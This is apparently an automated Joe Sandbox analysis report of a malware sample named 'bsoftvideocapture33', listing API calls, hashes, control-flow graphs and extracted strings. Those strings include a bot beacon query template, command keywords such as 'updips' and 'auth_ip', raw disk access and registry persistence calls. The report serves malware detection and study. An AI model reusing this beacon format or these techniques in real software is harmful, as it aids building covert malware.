• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
• String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
• API String ID: 1856495841-1038016512
• Opcode ID: d31c94d92147afa6ba2555e82d063cdccd04153856b11f7f1ef5d62ad0e47206
• Instruction ID: f2de5cdc11df340ae013fbc3c23cfa5b5a8bb36f2d04465d231be4eaa22d9941
• Opcode Fuzzy Hash: d31c94d92147afa6ba2555e82d063cdccd04153856b11f7f1ef5d62ad0e47206
• Instruction Fuzzy Hash: 0E71C5B1D483909FE320AF34AC45B5B7BE8AF4A314F050E1DF68897281DBB949149FD6

Control-flow Graph
APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02C0E9C2
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C0E9DB
• GetAdaptersInfo.IPHLPAPI(?,?), ref: 02C0EA00
• FreeLibrary.KERNEL32(00000000), ref: 02C0EA89
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll
• API String ID: 514930453-3114217049
• Opcode ID: 1a03db7a072eae7699902309c9c2319e4e22748aef69f7f2528ab870d9f76221
• Instruction ID: 18bcee5f8fa0b2ad5e98b7b31eac26e2020457b4ddd2cce0df3c4b26b2d97ed8
• Opcode Fuzzy Hash: 1a03db7a072eae7699902309c9c2319e4e22748aef69f7f2528ab870d9f76221
• Instruction Fuzzy Hash: 8C21E675E842199BDB14DBA9D8C07EEBFB9FF49710F1405A9E504E7280DB308A45CBA4

Control-flow Graph

APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02C0E8C7
• DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02C0E905
• GetLastError.KERNEL32 ref: 02C0E966
• CloseHandle.KERNELBASE(?), ref: 02C0E99D
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CloseControlCreateDeviceErrorFileHandleLast
• String ID: \\.\PhysicalDrive0
• API String ID: 4026078076-1180397377
• Opcode ID: a4ca5ae9e44952b5f35ac9585a95dcd83602ea7e4dcfee0c886c3854a62631a8
• Instruction ID: 6f4ac1e909c7c6992eee5d6080e7e25e54c19e9f36660531e97dd4698cba128a
• Opcode Fuzzy Hash: a4ca5ae9e44952b5f35ac9585a95dcd83602ea7e4dcfee0c886c3854a62631a8
• Instruction Fuzzy Hash: 7431A371D40229EBDB24CF98D884BEEBBB8EF45754F244569E505A3280DBB05B04CBD0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: _malloc$Heap_memset$CriticalSection$AllocateProcess$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
• String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
• API String ID: 219686520-1038016512
• Opcode ID: 9328ceb6c4e80aa2b8d27e53af9c4e62f05c3cdfd8074c4bebd9764950f151b6
• Instruction ID: e42d56f06b4d68f86d69accc815fdfeaa1cf141f4faf8c554f4191e645f97c0d
• Opcode Fuzzy Hash: 9328ceb6c4e80aa2b8d27e53af9c4e62f05c3cdfd8074c4bebd9764950f151b6
• Instruction Fuzzy Hash: 7D81F4B1D483809FD320AB34AC45B5BBBE5AF4A310F050D2DF688D7341DBB949159BD6

Control-flow Graph

APIs
• Sleep.KERNELBASE(0000EA60), ref: 02C06105
• RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C06110
• RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06121
  • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
• _memset.LIBCMT ref: 02C06481
• RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C064A4
• RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C064B5
• _malloc.LIBCMT ref: 02C0653C
• RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C0654E
• RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C0655A
• _memset.LIBCMT ref: 02C06574
• _memset.LIBCMT ref: 02C06583
• _memset.LIBCMT ref: 02C06593
• _memset.LIBCMT ref: 02C065A2
• _memset.LIBCMT ref: 02C065B1
• _malloc.LIBCMT ref: 02C0662B
• _memset.LIBCMT ref: 02C0663C
• _strtok.LIBCMT ref: 02C0665C
• _swscanf.LIBCMT ref: 02C06673
• _strtok.LIBCMT ref: 02C0668A
• _free.LIBCMT ref: 02C06696
• Sleep.KERNEL32(000007D0), ref: 02C0677A
• _memset.LIBCMT ref: 02C067F3
• RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C06800
• RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06812
  • Part of subcall function 02C0873C: __EH_prolog.LIBCMT ref: 02C08741
  • Part of subcall function 02C0873C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C087BC
  • Part of subcall function 02C0873C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C087DA
• _sprintf.LIBCMT ref: 02C0689C
• RtlEnterCriticalSection.NTDLL(00000020), ref: 02C06961
• RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C06995
  • Part of subcall function 02C05C12: _malloc.LIBCMT ref: 02C05C20
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
• String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
• API String ID: 3337033272-2823103634
• Opcode ID: fa46e6caa032cbacd4e7569c47c2ea421ab80fdfd077056ecbae4e49edaeca87
• Instruction ID: c8c10f2d4903ec51227dd69073231be0292c1e02a42b0e07300507456b6209ec
• Opcode Fuzzy Hash: fa46e6caa032cbacd4e7569c47c2ea421ab80fdfd077056ecbae4e49edaeca87
• Instruction Fuzzy Hash: BA1223716083819FE7349F24D881BAFBBE9AFC6718F14092DE589872C1DF719508DB92

Control-flow Graph

APIs
• FindResourceA.KERNEL32(?,0000000A), ref: 00401351
• SizeofResource.KERNEL32(00000000), ref: 00401370
Strings
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: Resource$FindSizeof
• String ID:
• API String ID: 3019604839-3916222277
• Opcode ID: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
• Instruction ID: b28a29316e79cb766f5da1f380b87f9e4da6436ce9bd12b8eed34f014587212c
• Opcode Fuzzy Hash: 138cf1d2708028cd6e9096853fa836b610bce6da07ce657d635f6670e06ad364
• Instruction Fuzzy Hash: 28810171D04258DFDF01CFE8D985AEEBBB0FB09315F1400AAE581B7262C3385A85DB69

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32 ref: 00402A46
                                                                                                                                          • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                                                          • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                                                        • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                                                                          • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2057626494-0
                                                                                                                                        • Opcode ID: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                                                        • Instruction ID: 77a0c2ab577daa94e22818ed769fd4cb67ba6910a5c0d3980e0314dd63f46b93
                                                                                                                                        • Opcode Fuzzy Hash: 5b516be980998e5fa11934bd411f48f35677f68372fd4b7f5b43ba3d9a21ae17
                                                                                                                                        • Instruction Fuzzy Hash: 31214CB19006159EDB14AFA6DE4AA6E7FA9EB04715F10413EF905BB2D1DB384900CA6C

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 740 401835-401838 741 40183a 740->741 742 40189b-40db06 740->742 744 401825-40dcb5 741->744 745 40183c-401cd2 GetLastError 741->745 750 40de16 742->750 754 40dcba 744->754 751 401fdf-401ff5 LoadLibraryExA 745->751 755 40de92 750->755 752 40d7f3-40d831 751->752 753 401ffb-40200d 751->753 752->755 758 40d57b-40d57e 753->758 754->754 756 401f68-401f6d 755->756 757 40de98-40deb8 755->757 756->758 758->750
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401852
                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00401FE2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastLibraryLoad
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3568775529-2766056989
                                                                                                                                        • Opcode ID: fa32cd7ee5d60e40f92298de5ee657d72ad152052aaf235de9ac9c55e9c029d1
                                                                                                                                        • Instruction ID: d5516f6041786ed170d3c0c06144c86260fc33ccfab8605abc871f512ee97d29
                                                                                                                                        • Opcode Fuzzy Hash: fa32cd7ee5d60e40f92298de5ee657d72ad152052aaf235de9ac9c55e9c029d1
                                                                                                                                        • Instruction Fuzzy Hash: 9C512271908145CFDB08CFA8EDA17EE7BB0FB06310F14816AE592B72E2D3784945DB59

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 759 2c01aa9-2c01ac3 InterlockedIncrement 760 2c01ac5-2c01ad7 WSAStartup InterlockedExchange 759->760 761 2c01add-2c01ae0 759->761 760->761
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(02C3529C), ref: 02C01ABA
                                                                                                                                        • WSAStartup.WS2_32(00000002,00000000), ref: 02C01ACB
                                                                                                                                        • InterlockedExchange.KERNEL32(02C352A0,00000000), ref: 02C01AD7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1856147945-0
                                                                                                                                        • Opcode ID: c2c6ca63c17d35ed66bebc1b9fb7df9b61b4f1b75e15022956994ea8b5ccaa4d
                                                                                                                                        • Instruction ID: 62970b67e62f34e8503e813d9c7964ca005a618b4f8e9cb1067c6146b39eb51c
                                                                                                                                        • Opcode Fuzzy Hash: c2c6ca63c17d35ed66bebc1b9fb7df9b61b4f1b75e15022956994ea8b5ccaa4d
                                                                                                                                        • Instruction Fuzzy Hash: E7D05E71DA42045BE23066A0AD4FB7A776CE70A752FC10B61FD6AC41C0EE92652885E7

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 762 40d149-40d14b 763 40d18c-40d190 762->763 764 40d14d-40d162 GetStartupInfoA 762->764 766 40d192 763->766 767 40d18a 763->767 764->767 769 40d387 call 401649 766->769 768 40d19e 767->768 768->769 771 40d38c-40dcb5 769->771 773 40dcba 771->773 773->773
                                                                                                                                        APIs
                                                                                                                                        • GetStartupInfoA.KERNEL32(0040BC80), ref: 0040D15C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoStartup
                                                                                                                                        • String ID: Common AppData
                                                                                                                                        • API String ID: 2571198056-2574214464
                                                                                                                                        • Opcode ID: e11149a184dbb0c256238520043bcf4877e83a20bfd6f2021a5085cfc2b6f98c
                                                                                                                                        • Instruction ID: 0bb3258f36f46a5c88c02bf45da4fdb8c915251985bcaa1644ac6c960dcc43ff
                                                                                                                                        • Opcode Fuzzy Hash: e11149a184dbb0c256238520043bcf4877e83a20bfd6f2021a5085cfc2b6f98c
                                                                                                                                        • Instruction Fuzzy Hash: C1F0E571D1D100CFC7086B95DA242B637B1EB58319B35447BD846BF1E1DABC080AA19F

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 786 403b64-403b82 HeapCreate 787 403b84-403b91 call 403a1c 786->787 788 403bba-403bbc 786->788 791 403ba0-403ba3 787->791 792 403b93-403b9e call 403f3b 787->792 794 403ba5 call 40478c 791->794 795 403bbd-403bc0 791->795 798 403baa-403bac 792->798 794->798 798->795 799 403bae-403bb4 HeapDestroy 798->799 799->788
                                                                                                                                        APIs
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                                                          • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                                                                        • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                                                          • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2507506473-0
                                                                                                                                        • Opcode ID: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                                                        • Instruction ID: 550f2133393d729a37de5e2391f12db29a8156ca4bb40a4077295a364e13fd94
                                                                                                                                        • Opcode Fuzzy Hash: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                                                        • Instruction Fuzzy Hash: A5F030706547019DDB101F319E4572A3AA89B4075BF10447FF900F91D1EFBC9684951D

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 774 40192c-40193b 775 401cc4-401ff5 LoadLibraryExA 774->775 776 40184f-401cd2 GetLastError 774->776 779 40d7f3-40d831 775->779 780 401ffb-40200d 775->780 776->775 781 40de92 779->781 782 40d57b-40de16 780->782 783 401f68-401f6d 781->783 784 40de98-40deb8 781->784 782->781 783->782
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00401852
                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00401FE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastLibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3568775529-0
                                                                                                                                        • Opcode ID: 5d9a8f9b6c94dc2d0ceaccf59ac2092baa1fe039045fc1d470e08c8011668634
                                                                                                                                        • Instruction ID: c79ba1d31e037f46b2450d03273a7c6e7ab4f6ac62d6348a8068dc6ce970176e
                                                                                                                                        • Opcode Fuzzy Hash: 5d9a8f9b6c94dc2d0ceaccf59ac2092baa1fe039045fc1d470e08c8011668634
                                                                                                                                        • Instruction Fuzzy Hash: 28F0E230A19205EFDB09CBA8D994BADB7B2BF05710F55806AE402772E0C7785A46DA15

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 800 2c9c01d-2c9c0bd DeleteFileA
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C38000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c38000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: f9803b8480792056e34924d2a2a8535bac6b1854602d0fb08de7774307fe52e0
                                                                                                                                        • Instruction ID: 9654f8ed02a773b43efc2cc6c6c56eecb654eada563c054437838b9be737d309
                                                                                                                                        • Opcode Fuzzy Hash: f9803b8480792056e34924d2a2a8535bac6b1854602d0fb08de7774307fe52e0
                                                                                                                                        • Instruction Fuzzy Hash: B20192F264C2009BEB053E19EC95779FBE5EF54320F1A492DDBD143340EA3A941586DB

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 801 401802-40180f RegCreateKeyExA 802 401815-40181d 801->802 803 40d1e9 801->803 802->803 805 40dc8d-40dca5 802->805 804 40df34-40df98 803->804 806 40df9d 804->806 805->804 806->806
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002), ref: 00401807
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: ba6927a38b2257f2ecdb45b97f7b8bff65bd7fc53d11e895a3e2d85cd6031c11
                                                                                                                                        • Instruction ID: d923ecf7cc0b7138f56083e88ccf011a39d065552f2ef49dfddf64746cfb0571
                                                                                                                                        • Opcode Fuzzy Hash: ba6927a38b2257f2ecdb45b97f7b8bff65bd7fc53d11e895a3e2d85cd6031c11
                                                                                                                                        • Instruction Fuzzy Hash: FE0184515091C08AE3065BA9AE616F63FB5D302340F48107ED5D2B72A3C43C490AEB1D

Control-flow Graph (recovered edges): 40d1e3 [RegCloseKey] -> 40d1e9-40df98 -> 40df9d -> 40df9d (self-loop)
APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 75ff2164dc8a7abc6bd7d7abba8b5f4b8d4660e1931557c14bfd96b563a853a2
• Instruction ID: b15390bd9e37436451516aa96a73ff984f6a966f42a6927e346401dd58fb0ef3
• Opcode Fuzzy Hash: 75ff2164dc8a7abc6bd7d7abba8b5f4b8d4660e1931557c14bfd96b563a853a2
• Instruction Fuzzy Hash: E0F054611155C48BD70A9BA9AE716A63FB5D302340F44407DD682A6263D53C590ADB1D

APIs
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C38000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c38000_bsoftvideocapture33.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: b0dd2d4e352bc6d16d6c2135eec307b7da6df9505f3b5d20b72da8d5659760e1
• Instruction ID: 3c5d743c6bda27cf0c99e94d127ada5c8eba49d8bd9a0de7e0da8f88190a02b6
• Opcode Fuzzy Hash: b0dd2d4e352bc6d16d6c2135eec307b7da6df9505f3b5d20b72da8d5659760e1
• Instruction Fuzzy Hash: ABE0CDB26583049FD3723649FCC97E7F3E4EB44211F0A0529D39143710FA35455486DB

APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: 4277b380ff83cd63e17ff96104b42d9b898c14e3e5168dfc32be21eedda8092d
• Instruction ID: 2cd0856ba97e3bf412aec3146a5630d14254a56439a6ff2d1ccf095111e7f1ec
• Opcode Fuzzy Hash: 4277b380ff83cd63e17ff96104b42d9b898c14e3e5168dfc32be21eedda8092d
• Instruction Fuzzy Hash: 65D012A0C0C006FDC3900AA01EE883B34AC650138C3719437E507700D0C53C2A4FB62F

APIs
• CreateDirectoryA.KERNELBASE ref: 0040D49F
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 7e3730ee33c11ba97f11e3f79a140faf31233aded7765e9d97d7188c65411aed
• Instruction ID: 8f6ef8068710ec2f19211bcf2c23eb8355cc0257c0ec37e96d28887ff5977714
• Opcode Fuzzy Hash: 7e3730ee33c11ba97f11e3f79a140faf31233aded7765e9d97d7188c65411aed
• Instruction Fuzzy Hash: C9C02B70C05810E6D04072E50E0DC2B200C8C4230433000377602300C3887D101A51BF

APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: e5b9a78a2c73aedf332491cfc037e0a70f06f76d3755ce8f5b1b1c42bb36e37d
• Instruction ID: a097fa76df8700e82137b1c95dde5690dc28a33263db371a8e36e70a98bacb54
• Opcode Fuzzy Hash: e5b9a78a2c73aedf332491cfc037e0a70f06f76d3755ce8f5b1b1c42bb36e37d
• Instruction Fuzzy Hash: 9BC08C70448018EAC51083408D0DEE522AC4704300F5100B36703B10D0C63C450B6A3A

APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: ca0f43783d24d3444b9e96b308ceb122488ec2790c8431c4624f44b8c8b2b0a7
• Instruction ID: 02787dda2aad0b73011b835152ae5dd3ca9a5de86f67dfe5cd15f24d3abcc573
• Opcode Fuzzy Hash: ca0f43783d24d3444b9e96b308ceb122488ec2790c8431c4624f44b8c8b2b0a7
• Instruction Fuzzy Hash: 2AB09B74404105EAD51557548E49ED5326C5704B10F1144767745764908578454E5955

APIs
• RegQueryValueExA.KERNELBASE(?), ref: 0040D6C7
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: d92cf84875f9c76641183f6f07d9ae92edda5dac98e07587da3feb5db9149b65
• Instruction ID: fb21790fa505c77033109dc37f10370514157f3a52298f6aab93d24c9f505fbd
• Opcode Fuzzy Hash: d92cf84875f9c76641183f6f07d9ae92edda5dac98e07587da3feb5db9149b65
• Instruction Fuzzy Hash: D5B09230D04905DACB015FE0890426DBA70BA44340721483A9862B1160DB764209AE2A

APIs
• RegCloseKey.KERNELBASE(?), ref: 0040DE1E
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 019306f91bb0a516ddcc5506d401865b58acaa02ff4c8b5701eb20f2b7f35127
• Instruction ID: 8df05d5140b126386bcbe442531bfaa431276761bc90c7e2a76cd10d99baf89a
• Opcode Fuzzy Hash: 019306f91bb0a516ddcc5506d401865b58acaa02ff4c8b5701eb20f2b7f35127
• Instruction Fuzzy Hash: 37B01234D48510FBCF111FD0CE04C5E7A315E887103210032B142300E2877D0419B7AF

APIs
• RegSetValueExA.KERNELBASE(?), ref: 0040DD60
Memory Dump Source
• Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 1b4ebe2fec5b4a3023f0bad9d63577fc66ec2e33e09b68b8b149b311f5e83236
• Instruction ID: cf0988a8e8a47b3c353c7c301440774cb7cbeba70b5db0076430efe6b1906566
• Opcode Fuzzy Hash: 1b4ebe2fec5b4a3023f0bad9d63577fc66ec2e33e09b68b8b149b311f5e83236
